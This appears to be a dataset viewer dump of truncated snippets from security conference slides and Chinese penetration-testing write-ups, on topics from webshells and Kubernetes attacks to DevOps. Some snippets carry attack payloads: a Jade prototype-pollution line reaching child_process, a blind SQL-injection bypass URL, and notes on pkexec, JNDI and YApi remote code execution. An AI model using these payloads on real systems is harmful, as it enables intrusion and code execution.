text
stringlengths
100
9.93M
category
stringclasses
11 values
1 Jscript加载Assembly踩坑记 前⾔ 理论⽀持 Assembly 从Jscript到C# 踩坑过程 问题解决 最后 @yzddmr6 最近想要给As-Exploits增加aspx类型的⽀持,就研究了⼀下冰蝎跟哥斯拉的实现。 由于冰蝎跟哥斯拉都采⽤的C#类型的shell,所以可以直接调⽤系统的⼀些api,并且可以加载任意的 shellcode。⽽蚁剑采⽤的是传统的Jscript。就想找个办法把它们两者结合起来,⽤Jscript加载C#的 assembly,以此来达到兼容原有shell类型的⽬的。 但是在实现的过程中踩了⼀些坑,所以就写下这篇⽂章记录⼀下。 这⾥要先提到⼀个概念叫Assembly,引⽤⼀下rebeyond师...
pdf
UPnP mapping Daniel Garcia (FormateZ) Toor.do Introduction ● Who am I ? ● What is UPnP(Universal Plug and Play) ? ● What is an IGD(Internet Gateway Device) ? ● How many IGD devices are on on-line ? UPnP hacking timeline 2001 – Ken from FTU – Three windows UPNP DoS attacks 2001 – Eeye – Multiple remote BoF XP/ME/98 UP...
pdf
我们知道hack都会使用C2(命令和控制)控制受感染的主机系统。这些C2中的大多数都 由大型僵尸网络控制,Hack只是简单地使用其中一些来访问系统,使他们可以转到另一 台设备中去或窃取凭据并获得对系统的“合法”访问。 我已经看到或听说过许多类型的C2,例如IRC,p2p,DNS,Twitter,Gmail,ICMP等。 C2隐藏流量家族越来越大,并且实现C2的方式每天都变得更具创造性。我很少为听到任 何新的C2感到惊讶。直到有一天与John Strand进行了交谈,他提到了可以使用HTTP 404 – File Not Found的C2 。这…引起了我的注意。作为安全专家,我知道这些以前C2 技术中的大多数很容易被检测和阻止。 尽...
pdf
本电子书为某站收费 VIP VIP VIP VIP 资源 由 灰鸽子网络资源分享社区 免费共享 灰鸽子网络资源分享社区,,,,致力为大家提供最新最全最优秀的网络资源! 论坛主要负责提供各类优秀视频,优秀书籍以及各类优秀源码资源。 网赚,编程,逆向,建站,安全这几个大方向。其中以 网赚,编程,逆向为主打方向。 http://www.huigezi.cc http://www.huigezi.cc http://www.huigezi.cc http://www.huigezi.cc <<<< 近期论坛经常被某些收费站 DDOS DDOS DDOS DDOS 攻击 >>>> http://www.duominuo.cc http://w...
pdf
Guidelines for Securing Your VoIP PBX Unregistered436 / Patrick McNeil – July 2015 Information Leakage Prevention (Confidentiality) Block scanners with firewall rules or a VoIP security appliance that matches on signatures of known scanners and/or credential cracking behaviors (See our iptables rules). Change th...
pdf
From LNK to RCE Finding bugs in Windows Shell Link Parser Lays Who am I - Lays • Senior Researcher at TeamT5 • Focus on Reverse Engineering / Vulnerability Research • MSRC Most Valuable Security Researcher 2019 / 2020 • Acknowledged by Microsoft / Samsung / NETGEAR / Synology … • HITCON / 217 CTF Team • Co-Founder of P...
pdf
指令型遠控軟體輕鬆談 指令型遠控軟體輕鬆談 簡報者 簡報者 Kelp Kelp kelp@phate.tw kelp@phate.tw PDF created with pdfFactory Pro trial version www.pdffactory.com 簡介 簡介 u u 了解指令型遠端操控軟體的基本架構 了解指令型遠端操控軟體的基本架構 PDF created with pdfFactory Pro trial version www.pdffactory.com 訓練大綱 訓練大綱 u u 單元 單元 11:何謂遠控軟體 :何謂遠控軟體 u u 單元 單元 22:遠控軟體分析 :遠控軟體分析 u u 單元 單元 33...
pdf
研发运营一体化(DevOps) 标准体系及能力成熟度模型解读 萧田国 DevOps时代社区发起人 高效运维社区发起人 个人介绍 萧田国 高效运维社区 发起人 DevOps 时代社区 发起人 DevOps 标准体系 联合发起人 DevOpsDays 中国 联合发起人 开放运维联盟主席 复旦大学特聘讲师 分享内容 1、DevOps 及缘起 2、DevOps 能力成熟度模型 解读 3、DevOps 能力成熟度模型 核心贡献者 4、DevOps 能力成熟度模型 本次重磅发布 5、DevOps 能力成熟度模型 评估参与办法 DevOps 及缘起 • 2008年,Patrick Debois 等初次提出 DevOps • 2009年,Patri...
pdf
Esoteric Exfiltration Willa Riggins Who Am I? Seriously, people. Does someone know? Cause I don’ t. ● Senior Penetration Tester @ Veracode ● FamiLAB Member ● DC407 Point of Contact ● OWASP Orlando Marketing Coordinator ● BSides Orlando Social Media Lady ● @willasaywhat on Twitter Exfiltration 101 What Is It? “Data...
pdf
January 17 2003 Whistleblowers and Team Players – an Islands in the Clickstream It was only after whistleblowers came out of the closet during the Great Deflation that Time Magazine honored the practice of what team players call “ratting out your pals.” Conservative magazines like Time may give lip service to whist...
pdf
Katana: Portable Multi-Boot Security Suite JP Dunning DefCon 2010 © Shadow Cave LLC JP Dunning Graduate Student: Computer Science, Virginia Tech Research Focus: Wireless and Portable Security Website: www.hackfromacave.com © Shadow Cave LLC To Many Tools! ● Finding Tools ● Cases of CDs – Keeping up with disks ● Tools...
pdf
AddHandler example-handler .sum application/x-httpd-twf application/x-httpd-twf ​ ​ mod_twf.so—— 0x00 0x01 ​ ​ cs:_Z15ub_error_handleP11request_rec_ptr // cs:_Z17mobileapp_handlerP11request_rec_ptr //mobileapp cs:_Z16webstore_handlerP11request_rec_ptr //webstore cs:_Z12nexttwf_mainP11request_rec_ptr //nexttwf...
pdf
CREATING THE DEFCON CHINA 1.0 BADGE joe Grand aka kingpin introduction / badge history • bring community together through interactivity • create game to encompass the defcon experience • simple design that could be expanded during/ after defcon • interactive, command-based menu for additional exploration goa...
pdf
Version 3.0 DEFCON 10 August 2002 Anatomy of Denial of Service Mitigation Testing Version 3.0 Agenda • Why Test? • Methodology • Challenges and Lessons Learned • Findings Version 3.0 DOS-3 Denial of Service Mitigation Testing Version 3.0 WHY? • Desire to Protect  Infrastructure  Data  Business Continuity • Evalua...
pdf
more more embedded embedded systems systems FX of Phenoelit Las Vegas 2003 Agenda Agenda Hacking the Matrix GSM 3G Basics GPRS backbone hacks Anonymous HTTP via WAP Siemens S55 Vulnerabilities Phenoelit‘s usual Cisco Øday vulnerability and exploit Hacking the MATRIX Hacking the MATRIX Enterasys Matrix E1 Vulner...
pdf
“Being in the Know” An overview to Scanning modern radio systems Presented by: Brett & Taylor Defcon 15 The Basics • Simplex – One frequency shared by multiple stations – Limited coverage • Tones – Continuous Tone Coded Squelch System (CTCSS) • Private Line (PL) – Digital Coded Squelch (DCS) • Repeaters – Two frequen...
pdf
Kubernetes集群渗透 攻击者视角中的Kubernetes Zhaoyan Xu 资深研究工程师 Palo Alto Networks 2019年5月29日 Tongbo Luo 首席AI安全科学家 JD.com 日程 背景 Kubernetes的安全特性 攻击方式 横向运动实践 答疑 背景 ➢Kubernetes在全球范围内广受欢迎 ➢ 所有主流云提供商都提供K8S集群服务,如AKS / EKS / GKE等 ➢ 根据iDatalabs[1] 的报告,大约有3,804家公司使用K8进行Web应用程序部署 ➢ 年度用户增长率超过150% ➢K8的安全性如何? ➢ K8S是否容易受到传统攻击? ➢ 什么是K8S群集的新攻击方式?...
pdf
Laboratory for Dependable Distributed Systems • RWTH Aachen University Far More Than You Ever Wanted To Tell Hidden Data In Document Formats Maximillian Dornseif at Defcon 2004, Las Vegas Maximillian Dornseif • Laboratory for Dependable Distributed Systems • RWTH Aachen University Warning • When you read this this sli...
pdf
APT与新威胁论坛 2 网络安全威胁中的商业军火 3 从HackingTeam说起 商业化间谍软件现状 商业军火带来的问题 可以采取的应对策略 4 从 说起 成立时间 2003年 创始人 David Vincenzetti(CEO) Valeriano Bedeschi(CIO) 核心人物 Alberto Ornaghi(软件架构师) Marco Valleri(进攻安全管理) 总部 米兰,意大利 免费开源 内网安全审计工具 基于MITM实现 “第一个面向警方 的商用黑客软件 ” 头像取自领英( Linkedin) 5 从 说起 部门 人数 管理 ...
pdf
2021$ Skrull$Like$A$King!$ 從重兵看守的天眼防線殺出重圍 aaaddress1@chroot.org April&21,&2021 2 Sheng-Hao$Ma$ Threat&Researcher&at&TXOne&Networks • Core$member$of&CHROOT&Security&Group& • Over$10-year$experience$in&reverse&engineering,&Windows& vulnerability,&and&Intel&8086.& • Spoke$at&S&P,&BlackHat,&DEFCON,&HITB,&HITCON,&VXCON,& RO...
pdf
How To Make Friends How To Make Friends & & Influence Lock Manufacturers Influence Lock Manufacturers Schuyler Towne & Jon King Schuyler Towne & Jon King DEFCON 16, 2008 DEFCON 16, 2008 Reviewing this on the DEFCON 16 DVD? Be sure to check ndemag.com/DC16 for updates. Much of the material covered in this talk is ...
pdf
C艹学习笔记 本笔记主干基于书籍《C艹面向对象程序设计教程(第4版)》,在此基础上会有所扩展。 内容如有不对之处,希望大家能够指出并私信我。 我的个人博客:https://www.kn0sky.com/ Web版笔记:https://wiki.kn0sky.com/#/note_cpp/README 第一章:面向对象程序设计概述 面向过程与面向对象 面向过程程序设计的主要特征是:程序由 过程定义 和 过程调用 组成 程序 = 过程 + 调用 面向对象程序设计的主要特征是:程序由类的定义和类的使用组成(一切消息由向对象发送消息来实 现,对象收到消息启动相关方法来完成) 程序 = 对象 + 消息 面向对象程序设计基本概念 对象:对象由数...
pdf
apache overview 0x00 twf.soapache 0x01 helloworld demo apacheapache apachehookexample 1 handler httpd.conf AddHandler example-handler .sum apache.sumr->handler“example-handler” handlerexample-handler 2 module AP_MODULE_DECLARE_DATA example_module = { STANDARD20_MODULE_STUFF, NULL, NULL, NULL, ...
pdf
从WEB脚本漏洞到客户端应用的 远程命令执行 @gainover XSS、CSRF、SQLi … 水稻、microRNA、DNA methylation … 关于我 昵称: Gainover 团队: PKAV WEB安全团队 (双螺旋安全实验室) 标签:前端开发,十年生物,乌云,WEB安全 Javascript、 VBscript、Flash actionscript ….. 一些老案例 。。。 浏览器 external API 设计不当 + 特权域边界绕过 攻击页面 -> XSS -> se.360.cn -> Install('ExtWebMail','1.1.0. 1013','360邮件通','http://www.w...
pdf
#BHUSA @BlackHatEvents Trying to be Everything to Everyone: Let’s Talk About Burnout Stacy Thayer, Ph.D. MBA @drstacythayer www.linkedin.com/in/stacythayer #BHUSA @BlackHatEvents Information Classification: General About This Talk • What is Burnout and What is Unique About the Security Industry • The Problem with ...
pdf
Face Swapping Video Detection with CNN Wang Yang, Junfeng Xiong, Liu Yan, Hao Xin, Wei Tao Baidu X-Lab Face Swapping Video Detection with C NN • Deepfakes Video • A simple and effective CNN • Face recognition based method Deepfakes Video When Face Recognition Systems Meet D eepfakes Vulnerable Face comparison before...
pdf
KERNEL WARS: KERNEL-EXPLOITATION DEMYSTIFIED Introduction to kernel-mode vulnerabilities and exploitation • Why exploit kernel level vulnerabilities? – It's fun! – Relatively few are doing it – Bypasses defense mechanisms and restrictions Introduction to kernel-mode vulnerabilities and exploitation • Why exploit k...
pdf
Credit Card Networks 101 What they are, and how to secure them by Robert Imhoff-Dousharm About this document While this serves as a simi-detailed account of said speech at Def-Con 11, it does leave holes in material to be presented. Some things are better spoken out, and better interpreted by mannerisms and body lan...
pdf
Visual Security Event Analysis DefCon 13 Las Vegas Raffael Marty, GCIA, CISSP Senior Security Engineer @ ArcSight July 29, 2005 * Raffael Marty 2 Defcon 2005 Las Vegas Raffael Marty ►Enterprise Security Management (ESM) specialist ►OVAL Advisory Board (Open Vulnerability and Assessment Language) ►ArcSight Research & De...
pdf
Don’t Fuck It Up! Zoz jackdawsart.com Unjust laws exist: shall we be content to obey them, or shall we endeavor to amend them, and obey them until we have succeeded, or shall we transgress them at once? —Henry David Thoreau, Civil Disobedience FUCK IT UP ⇥⇤⌅⇧⌃⌥ Tradecraft Perceptual Biases Expectations Resistance Am...
pdf
Goodbye Memory Scraping Malware Hold Out Till "Chip And Pin”. Weston Hecker Security Expert With KLJ Systems Network Analyst/Penetrations Tester/President Of Computer Security Association Of North Dakota #westonhecker #skimbadsoftware Who Am I What Do I Do What's the Talk About, • About Me: Speaker at Defcon 22 ...
pdf
服务器可信与硬件安全实践 目录 0 1 • 启动安全威胁 • 政策与行业 • 腾讯实践探索 启动安全威胁 0 1 服务器系统构成 启动安全威胁 0 1 启动链威胁 BMC BOOT &BMC&OS BOOT &BMC NIC &write SPI&flash PCH BOOT &ME&&&NIC BOOT UEFI BOOT Firmware Update OS BOOT SMM Handler &write SPI&flash Opt1Roms 3rd1NIC GPU FPGA,etc MotherBoard SPI&Flash AC&Power&On BMC SPI&Flash RAM RAM 红色:已知在野案例 橙色:实验案例...
pdf
Exploiting Windows Exploit Mitigation for ROP Exploits Omer Yair DEF CON 27 • Omer Yair • TDAD Endpoint Team Lead at Symantec • Speaker at DerbyCon, Virus Bulletin, Zero Nights • Photography BFA Graduate • Exhibited at multiple exhibitions • Photo book in the makings • @yair_omer Who Am I? Vote Sloth by Grant Shepley...
pdf
快手纵深攻防体系建设 分享者简介 姓名:黄浩 (浩天) 职务:快手安全蓝军(攻)负责人 经历:十余年信息安全从业经历,主打攻防能力建设 目录 一、四维时空红蓝对抗推演 二、面对面的纵深攻击演练 三、背对背的目标斩首行动 四、自适应的纵深防御体系 一、四维时空红蓝对抗推演 一、四维时空红蓝对抗推演 “纵深”这个词,空间换取时间,提到空间、时间,又会联想到爱因斯坦的“相对论”,四维时空,你可以 洞察过去、预见未来。红蓝对抗演练,更像是四维时空的产物,将未来可能发生的威胁和风险提前感知,所以 蓝军更像是未来部队! 一、四维时空红蓝对抗推演 红蓝对抗是对未来可能发生的安全风险进行推演,将外部风险、内部风险、以及不可预见的未知风险进行 提前排...
pdf
When TLS Hacks You JOSHUA MADDUX Demo Overview  Where I Started  Testing Approach  Implications  Concrete Vulnerabilities  Defense SSRF  Send a URL, server hits it SSRF  Send a URL, server hits it  Common in webhooks & Apple Pay support https://www.youtube.com/watch?v=m4BxIf9PUx0 EC2 IMDS V1 Easy! Just se...
pdf
1 Hijacking Arbitrary .NET Application Control Flow Topher Timzen & Ryan Allen Southern Oregon University Cybersecurity Research Lab F ABSTRACT This paper describes the use of Reflection in .NET and how it can be utilized to change the control flow of an arbitrary application at runtime. A tool, Gray Storm, will be intro...
pdf
文件上传反制跳板站点 本篇文章主要介绍一次通过黑客跳板站点,获取攻击者 IP 案例。利用前期的 信息收集对跳板站点进行渗透测试,一步步取证攻击者的攻击手法、工具和 IP 的 过程。 目录 文件上传反制跳板站点 ........................................................................................................................ 1 一、事件背景 ....................................................................................
pdf
101 Ways to Brick Your Hardware (With some un-bricking tips sprinkled in for good measure) Joe FitzPatrick & Joe Grand (Kingpin) Overview •What’s a Brick? •Kinds of Bricks •001: Bricking Firmware •010: Bricking PCBs •011: Bricking Connectors •100: Bricking ICs •101: Bricking ‘WTF’ scenarios •Recap and Best Prac...
pdf
安全认证相关漏洞挖掘 拿到⼀个系统⼤多很多情况下只有⼀个登录⼊⼝,如果想进⼀步得到较为⾼危的漏洞,只能去寻 找权限校验相关的漏洞,再结合后台洞,最终得到⼀个较为满意的漏洞。 这⾥列出⼀些较为常⻅的安全认证配置:  Spring Security  Apache Shiro  服务器本身(Tomcat、Nginx、Apache)401 认证  Tomcat 安全认证(结合web.xml) ⽆需代码实现  JSON Web Token 以上只是简单列出了⼀些笔者⻅过常⻅的安全认证配置组件。不同的鉴权组件存在异同的审计思 路。 ⼀、寻找未授权 这是笔者第⾸先会⼊⼿去看的点,毕竟如果能直接从未授权的点进⼊,就没必要硬刚鉴权逻辑 了...
pdf
2022/4/29 02:46 Evernote Export file:///C:/Users/jiushi/Desktop/JavaWeb 内存马技术归纳.html 1/12 环境:适用于tomcat ------------------------------------------------------- 前言: 对于各类Java 容器的内存马主要是需要获取context 为什么context 对象这么重要呢, 对于能达成的目的:context拥有当前中间件或框架处理请求、保存和控制servlet对象、保存和控制filter对象等功能的对象。 ----------------------------------------...
pdf
Speaking with Cryptographic Oracles Daniel “unicornFurnace” Crowley Application Security Consultant, Trustwave - Spiderlabs The Speaker and the Presentation A quick introduction and a few distinctions Copyright Trustwave 2010 Confidential The Speaker •  Daniel Crowley •  Web application security d00d •  IANAC...
pdf
前言 想起前段时间,我是非常抵触看官方文档的。官方文档是什么东西,我就算自己看源码学,我也不会看 你文档一点!现在发现文档是真的香啊。 那之前我想自定动作的时候, 我头是真的铁. 我居然自己看: https://b23.tv/NQuKiI, 实际上人家官方就有 详细的文档 新版写的写法 我大致翻了一下文档, 权限认证呢?我记得阅读 delete_selected() 源码的时候。是有权限认证的呀. 难道新版不需要了?仔细翻了一下,原来注解可以限制权限了。 我去翻了一下源码,新版本(3.2.3)的默认动作加上了注解。设置了所需权限和描述. 权限认证漏洞 我开始担心起来. 是否有人没有注意到需要设置权限或进行权限认证呢 ?更坏的情况...
pdf
CCD CoE · February 9, 2011 Sun Tzu and Cyber War Kenneth Geers Naval Criminal Investigative Service (NCIS) Cooperative Cyber Defence Centre of Excellence (CCD COE) Tallinn, Estonia Abstract Cyberspace is a new warfare domain. Computers and the in- formation they contain are prizes to be won during any military ...
pdf
Jade jade jade addwith plugin is not a function options.selftruejs jsnode.line {"__proto__":{"self":"true","line":"222222222"}} {"__proto__":{"self":"true","line":"2,jade_debug[0].filename));return 123;//"}} {"__proto__":{"self":"true","line":"2,jade_debug[0].filename));return global.process.mainModule.require('child...
pdf
So You Think Your Domain Controller Is Secure? Justin Hendricks @Script_Happens Abstract Domain Controllers are the crown jewels of an organization. Once they fall, everything in the domain falls . Organizations go to great lengths to secure their domain controllers, however they often fail to properly secure ...
pdf
Under the iHood DEFCON 16 Cameron Hotchkies 1 1chotchkies@tippingpoint.com DEFCON 16 Hotchkies ( chotchkies@tippingpoint.com ) Under the iHood DEFCON 16 1 / 50 About Me Work at TippingPoint’s Digital Vaccine Labs Responsible for vuln-discovery, patch analysis, product security Keep tabs on us at http://dvlabs.tippingpo...
pdf
Weaponizing the Web More Attacks on User Generated Content Saturday, August 1, 2009 Black Hat USA 2009 Comrades Citizen: Nathan Hamiel Senior Consultant - Idea InfoSec Associate Prof @UAT, Hexagon Security Group 23rd Degree Mason, LavaRolling Enthusiast Citizen: Shawn Moyer Principal Consultant - FishNet Security Douch...
pdf
pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle Brad Dixon - Carve Systems DEF CON 24 • It works • Easy • Teachable • Dramatic “USEFUL NOVELTY” • Risky • Crude • Perhaps redundant Demo Prior Art • Significant body of work around fault injection and glitching at the IC level for secure processo...
pdf
我是衬衫 忍者的帅气同学罢了 昨天晚上睡觉前做了两个小时的DarkCon的 CTF 然后今天我 看题目更新了 正好在向忍者师傅语音传授如何变得向我一样帅 然后我就发了题目链接给 他 1. WTF PHP 直接上传 php 后缀的文件没有任何的限制很简单 然后进入之后 phpinfo 看 disable_function pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcnt l_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus, pcntl_wtermsig,pcntl_...
pdf
An Undergraduate Security Curriculum Daniel J. Burroughs University of Central Florida About myself • Assistant Professor at UCF • Research includes – Correlation of distributed network sensors – Law enforcement data sharing network University of Central Florida • Established in 1963 • Part of the Florida State Univer...
pdf
Trojan-tolerant Hardware + Supply Chain Security in Practice Vasilios Mavroudis Doctoral Researcher, UCL Dan Cvrcek CEO, Enigma Bridge Who we are Vasilios Mavroudis Doctoral Researcher, UCL Dan Cvrcek CEO, Enigma Bridge George Danezis Professor, UCL Petr Svenda Assistant Professor, MUni CTO, Enigma Bridge Highlights ▪...
pdf
FILED OPEN COURT IN THE UNITED STATES DISTRICT COURT FOR THE EASTERN DISTRICT OF VIRGINIA Alexandria Division J 6 zuiz CLERK, U.S. DISTRICT COURT ALEXANDRIA. VIRGINIA UNITED STATES OF AMERICA Criminal No. 1:12CR3 Count One: 18 U.S.C. § 1962(d) - Conspiracy to Commit Racketeering Count Two: 18 U.S.C. §371 - Conspiracy t...
pdf
WebLogic CVE-2021-2294 JDBC 2021112,V-LabOracleWeblogic Server JDBC,2021421 Oracle 201911Yang ZhangBlackHat,MySQL JDBC https://i. blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf WebLogicJDBC jdbcObjectInputStream.readObjectWebLogic JDKJEP290ObjectInputFilterObjectInputS...
pdf
译者序 本书由 kuang110 和我共同翻译完成,其中笫 2、3、4、5、6 章为 kuang110 翻译,其它 的由本人翻译。由于是两人翻译的,而每个人的翻译风格可能会不同,所以,当你在书中看 到一个单词有两个完全不同的翻译时请不要惊讶,且由于本人翻译水平有限,不足之处在所 难免,但在翻译时我会尽量避免用一些晦涩难懂的长句。 本书的所讲的主要内容请看介绍部分,个人对本书的评价是适合有 C 语言基础而且有 对驱动开发有一定的了解的人阅读,因为本书是介绍 rootkit 而不是介绍驱动开发的,所以 对于什么是 DriverEntry,什么是卸载例程这些不会详细的讲解。本书适合于 rootkit 的入门, 讲的都是比较基础的东西,里面...
pdf
SQLBYPASS sql,fuzzpoc bjfytzs.aliyuncs.com/vul_poc_query?uuid=68dde649-bc6c-4c9e-8e4c- cb410977a53e&poc=hello_world'||' , fuzzfrom, ,ip ,ua+cookie,payload poc_data bjfytzs.aliyuncs.com/vul_poc_query?uuid=68dde649-bc6c-4c9e-8e4c- cb410977a53e&poc=hello_world'%27%26%26IFNULL(ascii(substring((select{x%2 0table_name}from%...
pdf
Plug For Plug-Ins Burning oil-based fuels, in addition to its political and economic problems, is the single largest contributor to U.S. greenhouse gas emissions. The interim strategy of increasing fuel efficiency of gasoline powered cars relies on a continuing commitment to gasoline. In parallel, strategies are ...
pdf
针对域证书服务的攻击(3)- ESC3 0x01 前言 在ESC1的利用的时候,好多小伙伴遇到一个错误,借用@Rcoil同学的图。解决方法也在星球,有@Rcoil 同学形成的文档。遇到这个错误的同学可以去看下。这个错误主要是因为2016以下的系统不支持这个 COM接口,因此需要改下代码。我开始以为是证书服务器16以下会出这个问题,但是我自己搭建12系统 的证书服务器环境发现并没有报错,因此我怀疑是域控在16以下。这算一个遗留问题,具体这个请求是 发送到域控还是证书服务器,需要后面分析,先mark下。 回归正题,今天时ESC3的分析,ESC3主要滥用的是错误配置了证书申请代理模板(Enrollment Agent Templates...
pdf
DefCon (China) 1, Beijing 2019 Breaking the back end! Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview   Transit Systems   Reverse Engineering   My Discoveries   The Exploit   The Lessons Brief History  The Anatomy of a Subway Hack (2008)...
pdf
Invisible Access Opening New Doors to Insecurity Marc Weber Tobias - Matt Fiddler - Tobias Bluzmanis ©2009 Security.org Agenda • Standards and Requirements • Electro-Mechanical Locks • Critical Infrastructure and Vulnerabilities • Real World Threats • Case Study: Electronic Access Control technology Standards: Mechanic...
pdf
Mark Ryan del Moral Talabis Dangerous Minds: The Art of Guerrilla Data Mining DEFCON 2009 2 Background  “Security Analytics”:  Concept of using data mining and AI in security  Presented techniques and theories that we could use  This Talk:  Move from theory to practical applications  Provide scenarios and e...
pdf
#BHUSA @BlackHatEvents Glitched on Earth by Humans: A Black-Box Security Evaluation of the SpaceX Starlink User Terminal Lennert Wouters @LennertWo COSIC #BHUSA @BlackHatEvents Starlink 101 Laser link Lower Earth Orbit (LEO) Space Earth User Terminal (UT) Gateway Internet Satellite 2 This talk Source: u/darkpenguin22...
pdf
How To Get Your Message Out Bruce Sutherland - KO4IN DEFCON 19 When Your Government Turns Off The Internet Bruce Sutherland - KO4IN DEFCON 19 /usr/bin/whoami  Information Systems field 20+ years  Designed and implemented networks since ARCNet was standard  Writing code professionally 15+ years  Licensed Ham Radio o...
pdf
起因 昨天在微信群看到个链接 搜了下发现是铁威马的NAS,文章没写解密过程,今天闲来无事就分析了下 0x00 简析结构 铁威马的NAS系统的UI使用PHP开发且文件为加密状态,解压打开后发现加载了 php_terra_master.so 文件,丢到 IDA 里发现是魔改的 phpscrew 加密 网上找了几篇解密的文章发现都不成功,怀疑密钥被更改 0X01 找密钥 由于 phpscrew 魔改版会把 md5 加密后的秘钥的前16位写入被加密的文件,所以对历史版本的PHP文 件和新的文件进行对比,对比后发现密钥确实被修改 然后下载了历史版本 4.1.27 和 4.2.28 的版本,发现关键库文件被修改过 用 Bindiff 打开这两个...
pdf
pkexec 0x00 CVE-2021-4034pkexec CVE-2021-4034 GCONV_PATH bypass hids LD_PRELOAD LD_PRELOADGCONV_PATH 0x01 pkexec swing 1. 2. 3. so 4. RCE pkexec 638 701clearenv 638701 g_printerrGCONV_PATH clearenvLD_PRELOAD pkexec clear execvLD_PRELOAD 0x02 disable functionputenv execdisable functionputenvLD_PRELOADpkexec pkexe...
pdf
Classification: Internal www.nviso.eu .NET reflection for post exploitation tradecraft in an EDR world. Classification: Internal Jean-François Maes Creator of redteamer.tips Host of “The voices of infosec” podcast Contributor to SANS SEC560 and SEC699 Devourer of chicken and other proteins #RedTeamFit # Whoami Classi...
pdf
You're Leaking Trade Secrets D E F C O N 2 2 You're Leaking TRADE SECRETS You're Leaking Trade Secrets You're Leaking Trade Secrets You're Leaking Trade Secrets You're Leaking Trade Secrets You're Leaking Trade Secrets You're Leaking Trade Secrets Michael Schrenk You're Leaking Trade Secrets You're Leaking Trade Sec...
pdf
Virtualization: Enough Holes to Work Vegas Defcon 15 Las Vegas, 2007 D.J. Capelis University of California, San Diego Introductory Notes ● Mostly known issues ● Mostly design flaws, not entirely bugs ● Documented behavior ● (So slightly less testing) – VMWare Server, not ESX or VI3. ● This is still untenable Overview ...
pdf
钓鱼城杯-WP Author:Nu1L Team 钓鱼城杯-WP Crypto confused_flag crypto0 WEB easyseed easyweb gamebox zblog RE Faker Goodbye reg APK LinkChecker PWN fsplayground unknown veryeasy Misc whitespace 张三的恶行 Crypto confused_flag #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * # context.log_level = 'debug' flag = [{} for _ ...
pdf
5space WrtieUp By Nu1L 5space WrtieUp By Nu1L Pwn H3llOR0P Crypto 5_vgcd Reverse 5_crackme crackme_2 Web 5_web_BaliYun 5_web_Eeeeasy_SQL eazylogin 5_web_letmeguess_1 Database cloudsql_reveage Misc sakan sakana_revenge 5_Misc_m@sTeR_0f Pwn H3llOR0P from pwn import * # p = process('./H3ll0Rop') p = remote('123.56.175.221...
pdf
从软件开发角度解密OWASP TOP 10 应用安全与安全的开发 OWASP TOP 10浅 析 安全开发演化 安全开发现状 企业所面临的安全挑战 S-SDLC落地实现 研发视角解决 OWASP TOP 10 日程 OWASP TOP 10 select id, uname, passwd from users where uname= ’$un$' and passwd=’$pw$' SQL Injection XSS 业务逻辑 第三方插件 OWASP TOP 10攻击思 路 安全与我有关系 吗 功能与安全距离 有多远 安全漏洞在哪里 安全离我有多远? OWASP TOP 10浅 析 安全开发演化 安全开发现状 企业所面临的安...
pdf
Kernel Exploitation Via Uninitialized Stack Kees Cook kees.cook@canonical.com www.canonical.com August 2011 2 Kernel Exploitation Via Uninitialized Stack by Kees Cook 20 Minutes! ● introduction ● quick Linux kernel exploitation basics ● audit callers of copy_from_user() for mistakes ● found a flawed function, but you ...
pdf
Discover vulnerabilities with CodeQL Security Researcher @ CyCraft CHROOT’s member Programming lover 🤓 qazbnm456 @boik_su Boik Su Agenda • Brief introduction to CodeQL • CodeQL’s Tricks • Replicate CVEs to find you CVEs • More powerful pattern finder • Regression Tests • ClientDependency Massacre • Conclusion 3 Agenda •...
pdf
Joe Grand Zoz Brooks More Projects of... ๏ Engineering entertainment program on Discovery Channel ๏ Four guys building prototypes of crazy things ๏ Followed the design/test/refine process ๏ Limited time & budget per episode ๏ Premiered October 2008 (US), ~February 2009 (World), 2012 (Netflix) ๏ Thir...
pdf
编译rc1环境 rc1的编译需要配置toolchains文件 在user/.m2目录下面 toolchains可以配置多个jdk的版本 这里9以上应该就可以,我这里使用11来编译。但是mvn的java版本还是1.8。 jep290绕过 JndiManager的lookup到最后还是去调用javax.naming.InitialContext的lookup方法。 所以在后续的利用中仍然存在。这里采用一种绕jep290的方式。dnslog和rmi的端口都是在我自己的vps上面设置的。我 搭建服务器的思路,每三秒register会重新绑定一个恶意对象去请求我的dnslog服务器,生成的是3个随机数。(当然这 里是简单为了验证这个漏洞的存在...
pdf
日志分析之昨天今天与明天 关于我 • 安全爱好者 • 安全防御研究 • 2012-2015 当当网 网信金融 • 2015-今 万达电商 日志的价值 我们遇到的日志 议程 • 昨天 • 今天 • 明天 昨天 • 那些年,还是iis的天下 • 0day? • 注入,我喜欢 :) 向当年的软件作者致敬 • awk • grep • wc • uniq • sort • 统计top n • 关键字过滤 确定入侵时间 状态码过滤 类型过滤 IP分析 确定入侵文件 IP访问 确定时间 状态码过滤 –Johnny Appleseed 日志展示界面(可视化) 今天 • 文...
pdf
关于昨天看到的url:的scheme 0x00 前⾔ 昨天看到p 发出来的那个url:的scheme的⼩技巧感觉很有意思,就仔细看了⼀下。 ⼤致如下: 意思是在url前加上前缀url:也可以正常执⾏,第⼀感觉应该是⽐如url:file:///etc/passwd可以拿来绕过startwith("file://")来请求file协议。 0x01 试⼀下 我不太懂java所以要试⼀下 正常请求百度,加了url:确实可以正常请求。试⼀下file 报错了,查了下,似乎是不允许把file协议丢给http handler来执⾏所以报错了。我不太清楚这是不是jdk1.8出来的问题。不过搜了⼀下改成下 ⾯这样确实可以了 0x02 跟⼀下 简单跟⼀下...
pdf
YApi 未授权用户创建&Mock远程命令执行漏洞 一、漏洞信息 监测到互联网上出现Yapi远程代码执行漏洞利用PoC,YApi 提供了编写JS 脚本方式来提供自定义mock 功能,JS脚本运行在NodeJs沙盒上,由于官方的沙盒只是为了隔离上下文,并不提供任何安全保证,攻 击者通过精心构造的Javascript代码可以绕过沙盒并用于执行任意系统命令,从而导致远程代码执行漏 洞,由于Yapi管理平台默认开放注册,攻击者可以注册任意用户进行漏洞利用; 建议受影响用户关闭用户注册进行防御,并删除用户列表中的不明用户,并等待官方补丁发布。 二、漏洞危害 YApi 提供了编写JS 脚本方式来提供自定义mock功能,JS脚本运行在NodeJs...
pdf
